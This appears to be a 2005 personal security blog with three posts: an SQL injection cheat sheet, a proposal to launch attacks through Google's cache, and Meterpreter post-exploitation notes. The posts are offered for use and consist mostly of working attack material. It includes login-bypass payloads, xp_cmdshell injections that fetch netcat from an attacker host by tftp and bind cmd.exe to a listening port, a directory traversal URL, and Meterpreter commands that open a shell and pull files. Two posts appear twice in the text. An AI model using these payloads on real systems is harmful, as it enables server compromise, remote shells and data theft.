A small reference when testing and using SQL Injection.
Note: This is for my reference, so if there is not enough detail I apologize.
Testing For SQL Injection Vulnerabilities:
We want to see if the input is sanitized or checked, below is something you can insert into the form to check.
ba' or 1=1--
Example:
User: ba' or 1=1--
Pass: ba' or 1=1--
Query Manipulation:
SELECT * FROM table WHERE user='ba'
-TO-
SELECT * FROM table WHERE user='ba' or 1=1--
Other examples (Depending on how the query was written here are other options to try) :
' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
' or '1'='1
" or "1"="1
') or ('1'='1
Note:( -- ) Is only needed for MS SQL servers. The ( -- ) will tell the server to ignore the rest of the query sometimes can replace with ( # ). This will make sure your signal quotes ( ' ) are in order. Also, if field is hidden you can run the form from your local box w/ the injection in it.
Remote Execution on MS SQL:
Now we know the server is vulnerable, while being nice, the above does not always allow us to bypass the login screen. Or we just may want to do something different. Here is an option.
Start a sniffer on a box you own:
# tcpdump udp and port 53 and victimhostname
Now make the victim do a DNS query against your box:
’; EXEC master..xp_cmdshell ‘nslookup mybox.com’ --
You will see the dns query in your tcpdump output. Which means the EXEC worked! Now you can do whatever you like. For demonstration purposes lets just upload NetCat and execute.
'; EXEC master..xp_cmdshell ‘tftp –I mybox.com GET nc.exe c:\nc.exe' --
Now execute netcat so it’s listening.
'; EXEC master..xp_cmdshell ‘c:\nc.exe –l –p 9999 –e cmd.exe’ –-
Now if you know what to do the box is all yours!
Note: The ( ; ) will end the previous query and start the next. Also, if the ( ' ) is not working try a ( " ).
Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become to long. Later I will cover other topics such as info gathering from ODBC error messages, Column gathering, querying specific things, blind SQL injection.
Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
Tuesday, November 29, 2005
Monday, November 7, 2005
Web Attacking Through Google
An attacker just may be able to do web based attacks through google. The goal of the attacker would be to have google process the malicious request against the target.
I first tested it with the ad-content section of the personal google page, which seems it does at least need some type of RSS content to process it.
For example, Here is a very very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant
At first I was thinking you can add this to "add content" on the personal page. Didn't seem to work. Like I said earlier it does want some type of RSS content.
So I then tried something like this in "add content".
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant
Still no go.
So then I thought google caching.
Basically you setup a static html page on some free web hosting company,the page would have all of the attack links(directory traversals,sql injections,php exploits, etc.)
Wait for google to cache it.
Viewing the page through google cache, the attacker could then launch all of the attacks from google.
This would all be done with a point and click.
Not really that dangerous since if you really wanted to find the attacker, google could provide you with logs. But it would be from an anonymous web site and would be two more steps.(could even proxy the registration of the site)
It would look weird for the person watching the IDS(google attacking??) some may even not think anything of it,thinking its the just the googlebot. Also, it would be hard for the target to block you considering most places do not want to block google.
This just kind of follows up Johnny Long's idea of zero-packet attacks.
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf
I first tested it with the ad-content section of the personal google page, which seems it does at least need some type of RSS content to process it.
For example, Here is a very very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant
At first I was thinking you can add this to "add content" on the personal page. Didn't seem to work. Like I said earlier it does want some type of RSS content.
So I then tried something like this in "add content".
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant
Still no go.
So then I thought google caching.
Basically you setup a static html page on some free web hosting company,the page would have all of the attack links(directory traversals,sql injections,php exploits, etc.)
Wait for google to cache it.
Viewing the page through google cache, the attacker could then launch all of the attacks from google.
This would all be done with a point and click.
Not really that dangerous since if you really wanted to find the attacker, google could provide you with logs. But it would be from an anonymous web site and would be two more steps.(could even proxy the registration of the site)
It would look weird for the person watching the IDS(google attacking??) some may even not think anything of it,thinking its the just the googlebot. Also, it would be hard for the target to block you considering most places do not want to block google.
This just kind of follows up Johnny Long's idea of zero-packet attacks.
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf
Thursday, November 3, 2005
Post-Exploitation w/ Meterpreter
Since I seem to forgot how to use Meterpreter everytime. Figured I would just document some basic functions of it.
More information can be found at http://www.metasploit.org
After the box is exploited and you have Meterpreter on the payload you can begin to use.
There are many extenstions that can be used. Different extentions provide different uses.
1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.
Here is how you load them.
use -m Process
loadlib: Loading library from ’ext950591.dll’ on the remote machine.
There is a lot you can do but I'm just going to show the what I use the most.
Below will get you a cmd prompt on machine.(assuming its windows)
meterpreter> execute -f cmd -c
execute: Executing ’cmd’...
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
You now have to interact with the assigned channel. Then you got cmd!
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y
With the Fs extentsion you can download and upload files.
meterpreter>use -m Fs
meterpreter>download file location
And thats pretty much what I use the most. Maybe later I will write an advanced section.
More information can be found at http://www.metasploit.org
After the box is exploited and you have Meterpreter on the payload you can begin to use.
There are many extenstions that can be used. Different extentions provide different uses.
1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.
Here is how you load them.
loadlib: Loading library from ’ext950591.dll’ on the remote machine.
There is a lot you can do but I'm just going to show the what I use the most.
Below will get you a cmd prompt on machine.(assuming its windows)
meterpreter> execute -f cmd -c
execute: Executing ’cmd’...
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
You now have to interact with the assigned channel. Then you got cmd!
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y
With the Fs extentsion you can download and upload files.
meterpreter>use -m Fs
meterpreter>download file location
And thats pretty much what I use the most. Maybe later I will write an advanced section.
Subscribe to:
Posts (Atom)
Posts
